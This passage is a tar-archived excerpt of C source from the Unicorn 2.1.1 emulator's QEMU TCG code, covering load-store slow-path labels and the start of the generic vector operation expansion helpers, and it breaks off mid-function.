�����������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/tcg-ldst.inc.c���������������������������������������������������������������0000664�0000000�0000000�00000005714�14675241067�0017374�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TCG Backend Data: load-store optimization only. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ typedef struct TCGLabelQemuLdst { bool is_ld; /* qemu_ld: true, qemu_st: false */ TCGMemOpIdx oi; TCGType type; /* result type of a load */ TCGReg addrlo_reg; /* reg index for low word of guest virtual addr */ TCGReg addrhi_reg; /* reg index for high word of guest virtual addr */ TCGReg datalo_reg; /* reg index for low word to be loaded or stored */ TCGReg datahi_reg; /* reg index for high word to be loaded or stored */ tcg_insn_unit *raddr; /* gen code addr of the next IR of qemu_ld/st IR */ tcg_insn_unit *label_ptr[2]; /* label pointers to be updated */ QSIMPLEQ_ENTRY(TCGLabelQemuLdst) next; } TCGLabelQemuLdst; /* * Generate TB finalization at the end of block */ static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l); static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l); static int tcg_out_ldst_finalize(TCGContext *s) { TCGLabelQemuLdst *lb; /* qemu_ld/st slow paths */ QSIMPLEQ_FOREACH(lb, &s->ldst_labels, next) { if (lb->is_ld ? !tcg_out_qemu_ld_slow_path(s, lb) : !tcg_out_qemu_st_slow_path(s, lb)) { return -2; } /* Test for (pending) buffer overflow. The assumption is that any one operation beginning below the high water mark cannot overrun the buffer completely. Thus we can test for overflow after generating code without having to check during generation. */ if (unlikely((void *)s->code_ptr > s->code_gen_highwater)) { return -1; } } return 0; } /* * Allocate a new TCGLabelQemuLdst entry. */ static inline TCGLabelQemuLdst *new_ldst_label(TCGContext *s) { TCGLabelQemuLdst *l = tcg_malloc(s, sizeof(*l)); QSIMPLEQ_INSERT_TAIL(&s->ldst_labels, l, next); return l; } ����������������������������������������������������unicorn-2.1.1/qemu/tcg/tcg-op-gvec.c����������������������������������������������������������������0000664�0000000�0000000�00000337036�14675241067�0017223�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Generic vector operation expansion * * Copyright (c) 2018 Linaro * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "tcg/tcg.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "tcg/tcg-gvec-desc.h" #define MAX_UNROLL 4 #ifdef CONFIG_DEBUG_TCG // static const TCGOpcode vecop_list_empty[1] = { 0 }; #else #define vecop_list_empty NULL #endif /* Verify vector size and alignment rules. OFS should be the OR of all of the operand offsets so that we can check them all at once. */ static void check_size_align(uint32_t oprsz, uint32_t maxsz, uint32_t ofs) { uint32_t opr_align = oprsz >= 16 ? 15 : 7; uint32_t max_align = maxsz >= 16 || oprsz >= 16 ? 15 : 7; tcg_debug_assert(oprsz > 0); tcg_debug_assert(oprsz <= maxsz); tcg_debug_assert((oprsz & opr_align) == 0); tcg_debug_assert((maxsz & max_align) == 0); tcg_debug_assert((ofs & max_align) == 0); } /* Verify vector overlap rules for two operands. */ static void check_overlap_2(uint32_t d, uint32_t a, uint32_t s) { tcg_debug_assert(d == a || d + s <= a || a + s <= d); } /* Verify vector overlap rules for three operands. */ static void check_overlap_3(uint32_t d, uint32_t a, uint32_t b, uint32_t s) { check_overlap_2(d, a, s); check_overlap_2(d, b, s); check_overlap_2(a, b, s); } /* Verify vector overlap rules for four operands. */ static void check_overlap_4(uint32_t d, uint32_t a, uint32_t b, uint32_t c, uint32_t s) { check_overlap_2(d, a, s); check_overlap_2(d, b, s); check_overlap_2(d, c, s); check_overlap_2(a, b, s); check_overlap_2(a, c, s); check_overlap_2(b, c, s); } /* Create a descriptor from components. */ uint32_t simd_desc(uint32_t oprsz, uint32_t maxsz, int32_t data) { uint32_t desc = 0; assert(oprsz % 8 == 0 && oprsz <= (8 << SIMD_OPRSZ_BITS)); assert(maxsz % 8 == 0 && maxsz <= (8 << SIMD_MAXSZ_BITS)); assert(data == sextract32(data, 0, SIMD_DATA_BITS)); oprsz = (oprsz / 8) - 1; maxsz = (maxsz / 8) - 1; desc = deposit32(desc, SIMD_OPRSZ_SHIFT, SIMD_OPRSZ_BITS, oprsz); desc = deposit32(desc, SIMD_MAXSZ_SHIFT, SIMD_MAXSZ_BITS, maxsz); desc = deposit32(desc, SIMD_DATA_SHIFT, SIMD_DATA_BITS, data); return desc; } /* Generate a call to a gvec-style helper with two vector operands. */ void tcg_gen_gvec_2_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2 *fn) { TCGv_ptr a0, a1; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); fn(tcg_ctx, a0, a1, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with two vector operands and one scalar operand. */ void tcg_gen_gvec_2i_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2i *fn) { TCGv_ptr a0, a1; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); fn(tcg_ctx, a0, a1, c, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with three vector operands. */ void tcg_gen_gvec_3_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_3 *fn) { TCGv_ptr a0, a1, a2; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); fn(tcg_ctx, a0, a1, a2, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with four vector operands. */ void tcg_gen_gvec_4_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4 *fn) { TCGv_ptr a0, a1, a2, a3; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); fn(tcg_ctx, a0, a1, a2, a3, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with five vector operands. */ void tcg_gen_gvec_5_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t xofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5 *fn) { TCGv_ptr a0, a1, a2, a3, a4; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); a4 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); tcg_gen_addi_ptr(tcg_ctx, a4, tcg_ctx->cpu_env, xofs); fn(tcg_ctx, a0, a1, a2, a3, a4, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_ptr(tcg_ctx, a4); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with three vector operands and an extra pointer operand. */ void tcg_gen_gvec_2_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2_ptr *fn) { TCGv_ptr a0, a1; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); fn(tcg_ctx, a0, a1, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with three vector operands and an extra pointer operand. */ void tcg_gen_gvec_3_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_3_ptr *fn) { TCGv_ptr a0, a1, a2; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); fn(tcg_ctx, a0, a1, a2, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with four vector operands and an extra pointer operand. */ void tcg_gen_gvec_4_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4_ptr *fn) { TCGv_ptr a0, a1, a2, a3; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); fn(tcg_ctx, a0, a1, a2, a3, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with five vector operands and an extra pointer operand. */ void tcg_gen_gvec_5_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t eofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5_ptr *fn) { TCGv_ptr a0, a1, a2, a3, a4; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); a4 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); tcg_gen_addi_ptr(tcg_ctx, a4, tcg_ctx->cpu_env, eofs); fn(tcg_ctx, a0, a1, a2, a3, a4, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_ptr(tcg_ctx, a4); tcg_temp_free_i32(tcg_ctx, desc); } /* Return true if we want to implement something of OPRSZ bytes in units of LNSZ. This limits the expansion of inline code. */ static inline bool check_size_impl(uint32_t oprsz, uint32_t lnsz) { if (oprsz % lnsz == 0) { uint32_t lnct = oprsz / lnsz; return lnct >= 1 && lnct <= MAX_UNROLL; } return false; } static void expand_clr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t maxsz); /* Duplicate C as per VECE. */ uint64_t dup_const_func(unsigned vece, uint64_t c) { switch (vece) { case MO_8: return 0x0101010101010101ull * (uint8_t)c; case MO_16: return 0x0001000100010001ull * (uint16_t)c; case MO_32: return 0x0000000100000001ull * (uint32_t)c; case MO_64: return c; default: // g_assert_not_reached(); return 0; } } /* Duplicate IN into OUT as per VECE. */ static void gen_dup_i32(TCGContext *tcg_ctx, unsigned vece, TCGv_i32 out, TCGv_i32 in) { switch (vece) { case MO_8: tcg_gen_ext8u_i32(tcg_ctx, out, in); tcg_gen_muli_i32(tcg_ctx, out, out, 0x01010101); break; case MO_16: tcg_gen_deposit_i32(tcg_ctx, out, in, in, 16, 16); break; case MO_32: tcg_gen_mov_i32(tcg_ctx, out, in); break; default: // g_assert_not_reached(); break; } } static void gen_dup_i64(TCGContext *tcg_ctx, unsigned vece, TCGv_i64 out, TCGv_i64 in) { switch (vece) { case MO_8: tcg_gen_ext8u_i64(tcg_ctx, out, in); tcg_gen_muli_i64(tcg_ctx, out, out, 0x0101010101010101ull); break; case MO_16: tcg_gen_ext16u_i64(tcg_ctx, out, in); tcg_gen_muli_i64(tcg_ctx, out, out, 0x0001000100010001ull); break; case MO_32: tcg_gen_deposit_i64(tcg_ctx, out, in, in, 32, 32); break; case MO_64: tcg_gen_mov_i64(tcg_ctx, out, in); break; default: // g_assert_not_reached(); break; } } /* Select a supported vector type for implementing an operation on SIZE * bytes. If OP is 0, assume that the real operation to be performed is * required by all backends. Otherwise, make sure than OP can be performed * on elements of size VECE in the selected type. Do not select V64 if * PREFER_I64 is true. Return 0 if no vector type is selected. */ static TCGType choose_vector_type(TCGContext *tcg_ctx, const TCGOpcode *list, unsigned vece, uint32_t size, bool prefer_i64) { if (TCG_TARGET_HAS_v256 && check_size_impl(size, 32)) { /* * Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. * It is hard to imagine a case in which v256 is supported * but v128 is not, but check anyway. */ if (tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V256, vece) && (size % 32 == 0 || tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V128, vece))) { return TCG_TYPE_V256; } } if (TCG_TARGET_HAS_v128 && check_size_impl(size, 16) && tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V128, vece)) { return TCG_TYPE_V128; } if (TCG_TARGET_HAS_v64 && !prefer_i64 && check_size_impl(size, 8) && tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V64, vece)) { return TCG_TYPE_V64; } return 0; } static void do_dup_store(TCGContext *tcg_ctx, TCGType type, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_vec t_vec) { uint32_t i = 0; switch (type) { case TCG_TYPE_V256: /* * Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ for (; i + 32 <= oprsz; i += 32) { tcg_gen_stl_vec(tcg_ctx, t_vec, tcg_ctx->cpu_env, dofs + i, TCG_TYPE_V256); } /* fallthru */ case TCG_TYPE_V128: for (; i + 16 <= oprsz; i += 16) { tcg_gen_stl_vec(tcg_ctx, t_vec, tcg_ctx->cpu_env, dofs + i, TCG_TYPE_V128); } break; case TCG_TYPE_V64: for (; i < oprsz; i += 8) { tcg_gen_stl_vec(tcg_ctx, t_vec, tcg_ctx->cpu_env, dofs + i, TCG_TYPE_V64); } break; default: g_assert_not_reached(); } if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Set OPRSZ bytes at DOFS to replications of IN_32, IN_64 or IN_C. * Only one of IN_32 or IN_64 may be set; * IN_C is used if IN_32 and IN_64 are unset. */ static void do_dup(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_i32 in_32, TCGv_i64 in_64, uint64_t in_c) { TCGType type; TCGv_i64 t_64; TCGv_i32 t_32, t_desc; TCGv_ptr t_ptr; uint32_t i; assert(vece <= (in_32 ? MO_32 : MO_64)); assert(in_32 == NULL || in_64 == NULL); /* If we're storing 0, expand oprsz to maxsz. */ if (in_32 == NULL && in_64 == NULL) { in_c = dup_const(vece, in_c); if (in_c == 0) { oprsz = maxsz; } } /* Implement inline with a vector type, if possible. * Prefer integer when 64-bit host and no variable dup. */ type = choose_vector_type(tcg_ctx, NULL, vece, oprsz, (TCG_TARGET_REG_BITS == 64 && in_32 == NULL && (in_64 == NULL || vece == MO_64))); if (type != 0) { TCGv_vec t_vec = tcg_temp_new_vec(tcg_ctx, type); if (in_32) { tcg_gen_dup_i32_vec(tcg_ctx, vece, t_vec, in_32); } else if (in_64) { tcg_gen_dup_i64_vec(tcg_ctx, vece, t_vec, in_64); } else { tcg_gen_dupi_vec(tcg_ctx, vece, t_vec, in_c); } do_dup_store(tcg_ctx, type, dofs, oprsz, maxsz, t_vec); tcg_temp_free_vec(tcg_ctx, t_vec); return; } /* Otherwise, inline with an integer type, unless "large". */ if (check_size_impl(oprsz, TCG_TARGET_REG_BITS / 8)) { t_64 = NULL; t_32 = NULL; if (in_32) { /* We are given a 32-bit variable input. For a 64-bit host, use a 64-bit operation unless the 32-bit operation would be simple enough. */ if (TCG_TARGET_REG_BITS == 64 && (vece != MO_32 || !check_size_impl(oprsz, 4))) { t_64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t_64, in_32); gen_dup_i64(tcg_ctx, vece, t_64, t_64); } else { t_32 = tcg_temp_new_i32(tcg_ctx); gen_dup_i32(tcg_ctx, vece, t_32, in_32); } } else if (in_64) { /* We are given a 64-bit variable input. */ t_64 = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, t_64, in_64); } else { /* We are given a constant input. */ /* For 64-bit hosts, use 64-bit constants for "simple" constants or when we'd need too many 32-bit stores, or when a 64-bit constant is really required. */ if (vece == MO_64 || (TCG_TARGET_REG_BITS == 64 && (in_c == 0 || in_c == -1 || !check_size_impl(oprsz, 4)))) { t_64 = tcg_const_i64(tcg_ctx, in_c); } else { t_32 = tcg_const_i32(tcg_ctx, in_c); } } /* Implement inline if we picked an implementation size above. */ if (t_32) { for (i = 0; i < oprsz; i += 4) { tcg_gen_st_i32(tcg_ctx, t_32, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t_32); goto done; } if (t_64) { for (i = 0; i < oprsz; i += 8) { tcg_gen_st_i64(tcg_ctx, t_64, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t_64); goto done; } } /* Otherwise implement out of line. */ t_ptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_ptr, tcg_ctx->cpu_env, dofs); t_desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, 0)); if (vece == MO_64) { if (in_64) { gen_helper_gvec_dup64(tcg_ctx, t_ptr, t_desc, in_64); } else { t_64 = tcg_const_i64(tcg_ctx, in_c); gen_helper_gvec_dup64(tcg_ctx, t_ptr, t_desc, t_64); tcg_temp_free_i64(tcg_ctx, t_64); } } else { typedef void dup_fn(TCGContext *, TCGv_ptr, TCGv_i32, TCGv_i32); static dup_fn * const fns[3] = { gen_helper_gvec_dup8, gen_helper_gvec_dup16, gen_helper_gvec_dup32 }; if (in_32) { fns[vece](tcg_ctx, t_ptr, t_desc, in_32); } else { t_32 = tcg_temp_new_i32(tcg_ctx); if (in_64) { tcg_gen_extrl_i64_i32(tcg_ctx, t_32, in_64); } else if (vece == MO_8) { tcg_gen_movi_i32(tcg_ctx, t_32, in_c & 0xff); } else if (vece == MO_16) { tcg_gen_movi_i32(tcg_ctx, t_32, in_c & 0xffff); } else { tcg_gen_movi_i32(tcg_ctx, t_32, in_c); } fns[vece](tcg_ctx, t_ptr, t_desc, t_32); tcg_temp_free_i32(tcg_ctx, t_32); } } tcg_temp_free_ptr(tcg_ctx, t_ptr); tcg_temp_free_i32(tcg_ctx, t_desc); return; done: if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Likewise, but with zero. */ static void expand_clr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t maxsz) { do_dup(tcg_ctx, MO_8, dofs, maxsz, maxsz, NULL, NULL, 0); } /* Expand OPSZ bytes worth of two-operand operations using i32 elements. */ static void expand_2_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); fni(tcg_ctx, t0, t0); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); } static void expand_2i_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, int32_t c, bool load_dest, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, int32_t)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (load_dest) { tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t1, t0, c); tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } static void expand_2s_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, TCGv_i32 c, bool scalar_first, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (scalar_first) { fni(tcg_ctx, t1, c, t0); } else { fni(tcg_ctx, t1, t0, c); } tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } /* Expand OPSZ bytes worth of three-operand operations using i32 elements. */ static void expand_3_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, bool load_dest, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t2, t0, t1); tcg_gen_st_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t0); } static void expand_3i_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, int32_t c, bool load_dest, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, int32_t)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t2, t0, t1, c); tcg_gen_st_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } /* Expand OPSZ bytes worth of three-operand operations using i32 elements. */ static void expand_4_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, bool write_aofs, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); 